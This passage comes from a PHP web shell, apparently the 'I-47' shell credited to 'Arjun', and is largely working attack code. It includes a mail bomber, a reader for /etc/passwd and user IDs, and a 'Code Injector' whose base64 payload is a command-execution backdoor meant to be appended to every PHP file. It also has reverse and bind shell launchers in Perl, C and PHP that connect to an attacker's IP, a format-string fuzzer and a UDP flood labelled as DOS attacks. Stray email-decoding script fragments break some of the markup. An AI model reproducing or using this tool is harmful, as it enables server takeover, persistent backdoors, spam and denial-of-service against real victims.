3499                     <tr>
3500                        <td style="width:30%;">
3501                            No. of Times  
3502                        </td>
3503                        <td>
3504                            <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
3505                        </td>
3506                    </tr>
3507           
3508                    <tr>
3509                        <td style="width:30%;">
3510                            
3511                            Pad your message (Less spam detection)
3512                            
3513                        </td>
3514                        <td>
3515                        
3516                            <input type="checkbox" name="padding"/>
3517                              
3518                        </td>
3519                    </tr>
3520                    <tr>
3521                        <td colspan="2">
3522                            <textarea name="message" cols="110" rows="10" class="box">Hello !! This is I-47!!</textarea>
3523                        </td>
3524                    </tr>
3525                    
3526                    
3527                    <tr>
3528                        <td rowspan="2">
3529                            <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="    Bomb!  "/>
3530                        </td>
3531                    </tr>
3532                </table>            
3533            </form>   
3534            <?php
3535                                         }
3536                                     }
3537                                     //Mass Mailer
3538                                     else if (isset($_GET['mail'])) {
3539                                         if (isset($_GET['to']) && isset($_GET['from']) && isset($_GET['subject']) && isset($_GET['message'])) {
3540                                             if (mail($_GET['to'], $_GET['subject'], $_GET['message'], "From:" . $_GET['from'])) {
3541                                                 echo "<center><font color=lime size=3><blink>Mail Sent!</blink></font></center>";
3542                                             } else {
3543                                                 echo "<center><font color=red size=3><blink>Some Error Occured!</blink></font></center>";
3544                                             }
3545                                         } else {
3546 ?>
3547        <div align="left">
3548         <form method="GET">
3549             <input type="hidden" name="mail" />
3550            <input type="hidden" name="mailbomb" />
3551             <table align="left" style="width:100%;">
3552                 <tr>
3553                     <td style="width:10%;">From</td>
3554                     <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in
3555 /* <![CDATA[ */
3556 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3557 /* ]]> */
3558 " onFocus="if(this.value == 'president@whitehouse.gov
3559 /* <![CDATA[ */
3560 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3561 /* ]]> */
3562 ')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.gov
3563 /* <![CDATA[ */
3564 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3565 /* ]]> */
3566 ';"/></td>
3567                 </tr>
3568                 
3569                 <tr>
3570                     <td style="width:20%;">To</td>
3571                     <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com
3572 /* <![CDATA[ */
3573 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3574 /* ]]> */
3575 ,victim2@domain.com
3576 /* <![CDATA[ */
3577 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3578 /* ]]> */
3579 " onFocus="if(this.value == 'victim@domain.com
3580 /* <![CDATA[ */
3581 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3582 /* ]]> */
3583 ,victim2@domain.com
3584 /* <![CDATA[ */
3585 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3586 /* ]]> */
3587 ')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com
3588 /* <![CDATA[ */
3589 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3590 /* ]]> */
3591 ,victim2@domain.com
3592 /* <![CDATA[ */
3593 (function(){try{var s,a,i,j,r,c,l,b=document.getElementsByTagName("script");l=b[b.length-1].previousSibling;a=l.getAttribute('data-cfemail');if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
3594 /* ]]> */
3595 ';"/></td>
3596                 </tr>
3597                 
3598                 <tr>
3599                     <td style="width:20%;">Subject</td>
3600                     <td style="width:80%;"><input type="text" class="box" name="subject" value="I-47 Here!!" onFocus="if(this.value == 'I-47 Here!!')this.value = '';" onBlur="if(this.value=='')this.value='I-47 Here!!';" /></td>
3601                 </tr>
3602                 
3603                 
3604                 <tr>
3605                     <td colspan="2">
3606                         <textarea name="message" cols="110" rows="10" class="box">Hello !! This is I-47!!!</textarea>
3607                     </td>
3608                 </tr>
3609                 
3610                 
3611                 <tr>
3612                     <td rowspan="2">
3613                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="   Send! "/>
3614                     </td>
3615                 </tr>
3616             </table>            
3617         </form></div>   
3618         <?php
3619                                         }
3620                                     }
3621                                 }
3622                                 // View Passwd file
3623                                 else if (isset($_GET['passwd'])) {
3624                                     $test = '';
3625                                     $tempp = tempnam($test, "cx");
3626                                     $get = "/etc/passwd";
3627                                     if (copy("compress.zlib://" . $get, $tempp)) {
3628                                         $fopenzo = fopen($tempp, "r");
3629                                         $freadz = fread($fopenzo, filesize($tempp));
3630                                         fclose($fopenzo);
3631                                         $source = htmlspecialchars($freadz);
3632                                         echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
3633                                         unlink($tempp);
3634                                     } else {
3635                                         if (isset($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2'])) {
3636                                             $temp = "";
3637                                             for (;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++) {
3638                                                 $uid = @posix_getpwuid($_GET['val1']);
3639                                                 if ($uid) $temp.= join(':', $uid) . "
3640 ";
3641                                             }
3642                                             echo '<br/>';
3643                                             paramexe('Users', $temp);
3644                                         } else {
3645 ?>
3646            <form>
3647                <input type="hidden" name="passwd">
3648                <table border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
3649                <tr>
3650                    <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
3651                </tr>
3652                <tr>
3653                    <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
3654                </tr>
3655                <tr>
3656                    <td colspan="2" align="center"><input type="submit" value="  Go  " class="but"></td>
3657                </tr>
3658                </table><br>
3659            </form>
3660            <?php
3661                                         }
3662                                     }
3663                                 }
3664                                 // Code Injector
3665                                 else if (isset($_GET['injector'])) {
3666 ?>
3667         <table id="margins" >
3668         <tr>
3669             <form method='POST'>
3670             <input type="hidden" name="injector"/>  
3671                 <tr>
3672                     <td width="100" class="title">
3673                         Directory
3674                     </td>
3675                     <td>
3676                          <input class="box" name="pathtomass" value="<?php echo getcwd() . $SEPARATOR; ?>" />
3677                     </td>
3678                 </tr>
3679                 <tr>
3680                 <td class="title">
3681                     Mode
3682                 </td>
3683                 <td>
3684                         <select style="width: 400px;" name="mode" class="box">
3685                             <option value="Apender">Apender</option>
3686                             <option value="Overwriter">Overwriter</option>
3687                         </select>
3688                 </td>
3689                 </tr>
3690                 <tr>
3691                     <td class="title">
3692                         File Type
3693                     </td>
3694                     <td>
3695                         <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3696                     </td>
3697                 </tr>
3698                 <tr>
3699                    <td>Create A backdoor by injecting this code in every php file of current directory</td>
3700                </tr>
3701                 
3702                 <tr>
3703                     <td colspan="2">
3704                         <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
3705                     </td>
3706                 </tr>
3707                 
3708                 
3709                 <tr>
3710                     <td rowspan="2">
3711                         <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="Inject "/>
3712                     </td>
3713                 </tr>
3714         </form>
3715         </table>
3716         <?php
3717                                 }
3718                                 // Connect
3719                                 else if (isset($_GET['connect'])) {
3720                                     if (isset($_POST['ip']) && isset($_POST['port']) && $_POST['ip'] != "" && $_POST['port'] != "") {
3721                                         $host = $_POST['ip'];
3722                                         $port = $_POST['port'];
3723                                         if ($_POST["lang"] == "perl") {
3724                                             if (is_writable(".")) {
3725                                                 @$fh = fopen(getcwd() . "/bc.pl", 'w');
3726                                                 @fwrite($fh, gzinflate(base64_decode($backconnect_perl)));
3727                                                 @fclose($fh);
3728                                                 echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
3729                                                 execmd("perl " . getcwd() . "/bc.pl $host $port", $disable);
3730                                                 if (!@unlink(getcwd() . "/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
3731                                             } else {
3732                                                 @$fh = fopen("/tmp/bc.pl", "w");
3733                                                 @fwrite($fh, gzinflate(base64_decode($backconnect_perl)));
3734                                                 @fclose($fh);
3735                                                 echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
3736                                                 execmd("perl /tmp/bc.pl $host $port", $disable);
3737                                                 if (!@unlink("/tmp/bc.pl")) echo "<font color='#FF0000'><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>";
3738                                             }
3739                                         } else if ($_POST["lang"] == "c") {
3740                                             if (is_writable(".")) {
3741                                                 $w_file = @fopen("backc", "w") or err();
3742                                                 if ($w_file) {
3743                                                     @fputs($w_file, base64_decode($back_connect_c));
3744                                                     @fclose($w_file);
3745                                                 }
3746                                                 chmod('backc', 0777);
3747                                                 //$blah = ex("gcc back.c -o backc");
3748                                                 $blah = execmd("./backc " . $host . " " . $port . " &");
3749                                                 echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
3750                                                 $_POST['backcconnmsg'] = "Trying to connect to <b>" . $host . "</b> on port <b>" . $port . "</b>.";
3751                                                 //if (file_exists("back.c")) { unlink("back.c"); }
3752                                                 if (file_exists("backc")) {
3753                                                     unlink("backc");
3754                                                 }
3755                                             } else {
3756                                                 chmod('/tmp/backc', 0777);
3757                                                 $w_file = @fopen("/tmp/backc", "w") or err();
3758                                                 if ($w_file) {
3759                                                     @fputs($w_file, base64_decode($back_connect_c));
3760                                                     @fclose($w_file);
3761                                                 }
3762                                                 //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
3763                                                 $blah = execmd("./backc " . $host . " " . $port . " &");
3764                                                 echo "<font color='#FFFFFF' size=3>Attempting to connect...</font></br>";
3765                                                 $_POST['backcconnmsg'] = "Trying to connect to <b>" . $_POST['backconnectip'] . "</b> on port <b>" . $_POST['backconnectport'] . "</b>.";
3766                                                 //if (file_exists("back.c")) { unlink("back.c"); }
3767                                                 if (file_exists("/tmp/backc")) {
3768                                                     unlink("/tmp/backc");
3769                                                 }
3770                                             }
3771                                         } else if ($_POST["lang"] == "php") {
3772                                             echo "<font color='#FFFFFF' size=3>Attempting to connect...</font>";
3773                                             $ip = $_POST['ip'];
3774                                             $port = $_POST['port'];
3775                                             $sockfd = fsockopen($ip, $port, $errno, $errstr);
3776                                             if ($errno != 0) {
3777                                                 echo "<font color='red'><b>$errno</b> : $errstr</font>";
3778                                             } else if (!$sockfd) {
3779                                                 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
3780                                             } else {
3781                                                 fputs($sockfd, "
3782 =================================================================
3783 Coded By Arjun
3784 =================================================================");
3785                                                 $pwd = exec_all("pwd");
3786                                                 $sysinfo = exec_all("uname -a");
3787                                                 $id = exec_all("id");
3788                                                 $len = 1337;
3789                                                 fputs($sockfd, $sysinfo . "
3790 ");
3791                                                 fputs($sockfd, $pwd . "
3792 ");
3793                                                 fputs($sockfd, $id . "
3794 
3795 ");
3796                                                 fputs($sockfd, $dateAndTime . "
3797 
3798 ");
3799                                                 while (!feof($sockfd)) {
3800                                                     $cmdPrompt = "(I47)[$]> ";
3801                                                     fputs($sockfd, $cmdPrompt);
3802                                                     $command = fgets($sockfd, $len);
3803                                                     fputs($sockfd, "
3804 " . exec_all($command) . "
3805 
3806 ");
3807                                                 }
3808                                                 fclose($sockfd);
3809                                             }
3810                                         }
3811                                     } else if (isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang'])) {
3812                                         $passwd = $_POST['passwd'];
3813                                         if ($_POST['lang'] == 'c') {
3814                                             if (is_writable(".")) {
3815                                                 @$fh = fopen(getcwd() . "/bp.c", 'w');
3816                                                 @fwrite($fh, gzinflate(base64_decode($bind_port_c)));
3817                                                 @fclose($fh);
3818                                                 execmd("chmod " . getcwd() . "/bp.c 0755");
3819                                                 execmd("gcc -o " . getcwd() . "/bp " . getcwd() . "/bp.c");
3820                                                 execmd("chmod " . getcwd() . "/bp 0755");
3821                                                 $out = execmd(getcwd() . "/bp" . " " . $_POST['port'] . " " . $passwd . " &");
3822                                                 echo "<pre>$out
3823 " . execmd("ps aux | grep bp.pl") . "</pre>";
3824                                             } else {
3825                                                 @$fh = fopen("/tmp/bp.c", "w");
3826                                                 @fwrite($fh, gzinflate(base64_decode($bind_port_c)));
3827                                                 @fclose($fh);
3828                                                 execmd("chmod /tmp/bp.c 0755");
3829                                                 execmd("gcc -o /tmp/bp /tmp/bp.c");
3830                                                 $out = execmd("/tmp/bp" . " " . $_POST['port'] . " " . $passwd . " &");
3831                                                 echo "<pre>$out
3832 " . execmd("ps aux | grep bp") . "</pre>";
3833                                             }
3834                                         }
3835                                         if ($_POST['lang'] == 'perl') {
3836                                             if (is_writable(".")) {
3837                                                 @$fh = fopen(getcwd() . "/bp.pl", 'w');
3838                                                 @fwrite($fh, gzinflate(base64_decode($bind_port_p)));
3839                                                 @fclose($fh);
3840                                                 execmd("chmod " . getcwd() . "/bp.pl 0755");
3841                                                 $out = execmd("perl " . getcwd() . "/bp.pl" . " " . $passwd . " &");
3842                                                 echo "<pre>$out
3843 " . execmd("ps aux | grep bp.pl") . "</pre>";
3844                                             } else {
3845                                                 @$fh = fopen("/tmp/bp.pl", "w");
3846                                                 @fwrite($fh, gzinflate(base64_decode($bind_port_p)));
3847                                                 @fclose($fh);
3848                                                 $out = execmd("perl /tmp/bp.pl " . $passwd . " &");
3849                                                 echo "<pre>$out
3850 " . execmd("ps aux | grep bp.pl") . "</pre>";
3851                                             }
3852                                         }
3853                                     } else {
3854 ?>       
3855     <table style="width:50%" align="center" >
3856     <tr>
3857         <th colspan="1" width="50px">Reverse Shell</th>
3858         <th colspan="1" width="50px">Bind Shell</th>
3859     </tr>
3860     <tr>
3861         <form action='<?php echo $self; ?>?connect' method='post' >  
3862          <td>
3863             <table style="border-spacing: 6px;">
3864                 <tr>
3865                     <td>IP </td>
3866                     <td>
3867                         <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip(); ?>" />
3868                     </td>
3869                 </tr>
3870                 <tr>
3871                     <td>Port </td>
3872                     <td><input style="width: 200px;" class="box" name="port" size='5' value="21"/></td>
3873                </tr>
3874                <tr>
3875                    <td style="vertical-align:top;">Use:</td> 
3876                    <td><select style="width: 95px;" name="lang" class="sbox">
3877                        <option value="perl">Perl</option>
3878                        <option value="c">C</option>
3879                        <option value="php">PHP</option>
3880                        </select>&nbsp;&nbsp;
3881                    <input style="width: 90px;" class="but" type="submit" value="Connect!"/></td>
3882                    
3883                </tr>
3884             </table>
3885          </td>
3886       </form> 
3887          <form action='<?php echo $self; ?>?connect' method='post' >
3888          <td style="vertical-align:top;">
3889             <table style="border-spacing: 6px;">
3890                 <tr>
3891                     <td>Port</td>
3892                     <td>
3893                         <input style="width: 200px;" class="box" name="port" value="21" />
3894                     </td>
3895                 </tr>
3896                 <tr>
3897                     <td>Password </td>
3898                     <td>
3899                        <input style="width: 200px;" class="box" name="passwd" value="I-47"/>
3900                    </td>
3901                    <tr>
3902                        <td>Using</td>
3903                        <td>
3904                        <select style="width: 95px;" name="lang" id="lang" class="sbox">
3905                        <option value="perl">Perl</option>
3906                        <option value="c">C</option>
3907                        </select>&nbsp;&nbsp;
3908                        <input style="width: 90px;" class="but" type="submit" value=" Bind "/></td>
3909                 </tr>
3910             </table>
3911          </td>
3912          </form>
3913     </tr>
3914     </table>
3915    <div align="center"><font color="#FF0000" size="3">Click "Connect" only after open port for it. You should use NetCat, run "nc -l -n -v -p 21"!</font></div>
3916     <p align="center"><font color="#FF0000" size="3">Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</font></p>
3917 <?php
3918                                     }
3919                                 }
3920                                 //fuzzer
3921                                 else if (isset($_GET['fuzz'])) {
3922                                     if (isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['times']) && isset($_GET['time']) && isset($_GET['message']) && isset($_GET['messageMultiplier']) && $_GET['message'] != "" && $_GET['time'] != "" && $_GET['times'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['messageMultiplier'] != "") {
3923                                         $IP = $_GET['ip'];
3924                                         $port = $_GET['port'];
3925                                         $times = $_GET['times'];
3926                                         $timeout = $_GET['time'];
3927                                         $send = 0;
3928                                         $ending = "";
3929                                         $multiplier = $_GET['messageMultiplier'];
3930                                         $data = "";
3931                                         $mode = "tcp";
3932                                         $data.= "GET /";
3933                                         $ending.= " HTTP/1.1
3934 
3935 
3936 
3937 
3938 ";
3939                                         if ($_GET['type'] == "tcp") {
3940                                             $mode = "tcp";
3941                                         }
3942                                         while ($multiplier--) {
3943                                             $data.= urlencode($_GET['message']);
3944                                         }
3945                                         $data.= "%s%s%s%s%d%x%c%n%n%n%n"; // add some format string specifiers
3946                                         $data.= "by-I-47" . $ending;
3947                                         $length = strlen($data);
3948                                         echo "Sending Data :- <br /> <p align='center'>$data</p>";
3949                                         print "I am at ma Work now <img src="/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /> ;D! Dont close this window untill you recieve a message <br>";
3950                                         for ($i = 0;$i < $times;$i++) {
3951                                             $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
3952                                             if ($socket) {
3953                                                 fwrite($socket, $data, $length);
3954                                                 fclose($socket);
3955                                             }
3956                                         }
3957                                         echo "<script>alert('Fuzzing Completed!');</script>";
3958                                         echo "DOS attack against $mode://$IP:$port completed on " . date("h:i:s A") . "<br />";
3959                                         echo "Total Number of Packets Sent : " . $times . "<br />";
3960                                         echo "Total Data Sent = " . HumanReadableFilesize($times * $length) . "<br />";
3961                                         echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
3962                                     } else {
3963 ?>
3964         <form method="GET">
3965             <input type="hidden" name="fuzz" />
3966             <table id="margins">
3967                 <tr>
3968                     <td width="400" class="title">
3969                         IP
3970                     </td>
3971                     <td>
3972                         <input class="box" name="ip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3973                     </td>
3974                 </tr>
3975                 
3976                 <tr>
3977                     <td class="title">
3978                         Port
3979                     </td>
3980                     <td>
3981                         <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3982                     </td>
3983                 </tr>
3984                 
3985                 <tr>
3986                     <td class="title">
3987                         Timeout
3988                     </td>
3989                     <td>
3990                         <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
3991                     </td>
3992                 </tr>
3993                 
3994                 
3995                 <tr>
3996                     <td class="title">
3997                         No of times
3998                     </td>
3999                     <td>
4000                         <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
4001                     </td>
4002                 </tr>
4003                 
4004                 <tr>
4005                     <td class="title">
4006                         Message <font color="red">(The message Should be long and it will be multiplied with the value after it)</font>
4007                     </td>
4008                     <td>
4009                         <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
4010                     </td>
4011                     <td>
4012                         x
4013                     </td>
4014                     <td width="20">
4015                         <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
4016                     </td>
4017                 </tr>
4018                 
4019                 <tr>
4020                     <td rowspan="2">
4021                         <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="but" value="  Submit  "/>
4022                     </td>
4023                 </tr>
4024             </table>            
4025         </form>
4026         <?php
4027                                     }
4028                                 }
4029                                 //DDos
4030                                 else if (isset($_GET['dos'])) {
4031                                     if (isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "") {
4032                                         $IP = $_GET['ip'];
4033                                         $port = $_GET['port'];
4034                                         $executionTime = $_GET['exTime'];
4035                                         $noOfBytes = $_GET['noOfBytes'];
4036                                         $data = "";
4037                                         $timeout = $_GET['timeout'];
4038                                         $packets = 0;
4039                                         $counter = $noOfBytes;
4040                                         $maxTime = time() + $executionTime;;
4041                                         while ($counter--) {
4042                                             $data.= "X";
4043                                         }
4044                                         $data.= " I-47";
4045                                         print "I am at ma Work now <img src="/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /> ;D! Dont close this window untill you recieve a message <br>";
4046                                         while (1) {
4047                                             $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
4048                                             if ($socket) {
4049                                                 fwrite($socket, $data);
4050                                                 fclose($socket);
4051                                                 $packets++;
4052                                             }
4053                                             if (time() >= $maxTime) {
4054                                                 break;
4055                                             }
4056                                         }
4057                                         echo "<script>alert('Dos Completed!');</script>";
4058                                         echo "DOS attack against udp://$IP:$port completed on " . date("h:i:s A") . "<br />";
4059                                         echo "Total Number of Packets Sent : " . $packets . "<br />";
4060                                         echo "Total Data Sent = " . HumanReadableFilesize($packets * $noOfBytes) . "<br />";
4061                                         echo "Data per packet = " . HumanReadableFilesize($noOfBytes) . "<br />";
4062                                     } else {
4063 ?>
4064            <form method="GET">
4065                <input type="hidden" name="dos" />
4066                <table id="margins">
4067                    <tr>
4068                        <td width="400" class="title">
4069                            IP
4070                        </td>
4071                        <td>
4072                            <input class="box" name="ip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
4073                        </td>
4074                    </tr>
4075                    
4076                    <tr>
4077                        <td class="title">
4078                            Port
4079                        </td>
4080                        <td>
4081                            <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
4082                        </td>
4083                    </tr>
4084                    
4085                    <tr>
4086                        <td class="title">
4087                            Timeout <font color="red">(Time in seconds)</font>
4088                        </td>
4089                        <td>
4090                            <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
4091                        </td>
4092                    </tr>
4093                    
4094                    
4095                    <tr>
4096                        <td class="title">
4097                            Execution Time <font color="red">(Time in seconds)</font> 
4098                        </td>
4099                        <td>
4100                            <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
4101                        </td>
4102                    </tr>
4103                    
4104                    <tr>
4105                        <td class="title">
4106                            No of Bytes per/packet
4107                        </td>
4108                        <td>
4109                            <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
4110                        </td>
4111                    </tr>
4112                    
4113    
4114                    <tr>
4115                        <td rowspan="2">
4116                            <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="but" value="   Attack >> "/>
4117                        </td>
4118                    </tr>
4119                </table>            
4120            </form>
4121            <?php
4122                                     }
4123                                 }
4124                                 // Sec info
4125                                 else if (isset($_GET['secinfo'])) { ?>
4126 <br><br><center><font color =red size=5>Server security information</font><br><br></center>
4127    <table style="width:100%;" border="1">
4128    <tr>
4129        <td style="width:7%;">Curl</td>
4130        <td style="width:7%;">Oracle</td>
4131        <td style="width:7%;">MySQL</td>
4132        <td style="width:7%;">MSSQL</td>
4133        <td style="width:7%;">PostgreSQL</td>
4134        <td style="width:12%;">Open Base Directory</td>
4135        <td style="width:10%;">Safe_Exec_Dir</td>
4136        <td style="width:7%;">PHP Version</td>
4137        <td style="width:7%;">Server Admin</td> 
4138    </tr>
4139    <tr>
4140        <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
4141        <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
4142        <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
4143        <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
4144        <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
4145        <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
4146        <td style="width:10%;"><font class="txt"><?php if (@function_exists('ini_get')) {
4147                                         if ('' == ($df = @ini_get('safe_mode_exec_dir'))) {
4148                                             echo "<font color=red>NONE</font></b>";
4149                                         } else {
4150                                             echo "<font color=green>$df</font></b>";
4151                                         };
4152                                     } ?></font></td>
4153        <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
4154        <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
4155    </tr>
4156 </table><br> <?php
4157                                     mysecinfo();
4158                                 } else if (isset($_GET['perms'])) {
4159 ?>
4160     <form method="POST" action="<?php echo $self; ?>" >
4161    <input type="hidden" name="myfilename" value="<?php echo $_GET['file']; ?>">
4162         <table align="center" border="1" style="width:40%;">
4163             <tr>
4164                 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td> 
4165             </tr>
4166            <tr>
4167                <td colspan="2" align="center" style="height:60px">
4168         <input type="Submit" value="Change Permission" class="but" style="padding: 5px;" name="changeperms"/></td>
4169            </tr>
4170         </table>
4171        
4172    </form>   
4173     <?php
4174                                 } else if (isset($_GET['rename'])) {
4175 ?>
4176     <form method="GET" action="<?php echo $self; ?>" >
4177    <input type="hidden" name="getdir" value="<?php echo $_GET['getdir']; ?>">
4178         <table>
4179             <tr>
4180                 <td>File </td><td> : </td><td><input value="<?php echo $_GET['rename']; ?>" name="file" class="box" /></td>
4181             </tr>
4182             <tr>
4183                 <td>To </td><td> : </td><td><input value="<?php echo $_GET['rename']; ?>" name="to" class="box" /></td> 
4184             </tr>
4185         </table>
4186        <br>
4187         <input type="Submit" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/>
4188 </form>   
4189     <?php
4190                                 } else if (isset($_GET['open'])) {
4191 ?>
4192         <form method="POST" action="<?php echo $self; ?>"\>
4193         <table>
4194             <tr>
4195                 <td>File </td><td> : </td><td><input value="<?php echo $_GET['open']; ?>" class="box" name="file" /></td>
4196             </tr>
4197             <tr>
4198                 <td>Size </td><td> : </td><td><input value="<?php echo filesize($_GET['open']); ?>" class="box" /></td> 
4199             </tr>
4200         </table>
4201         <textarea name="content" rows="20" cols="100" class="box"><?php
4202                                     $content = htmlspecialchars(file_get_contents($_GET['open']));
4203                                     if ($content) {
4204                                         echo $content;
4205                                     } else if (function_exists('fgets') && function_exists('fopen') && function_exists('feof')) {
4206                                         fopen($_GET['open']);
4207                                         while (!feof()) {
4208                                             echo htmlspecialchars(fgets($_GET['open']));
4209                                         }
4210                                     }
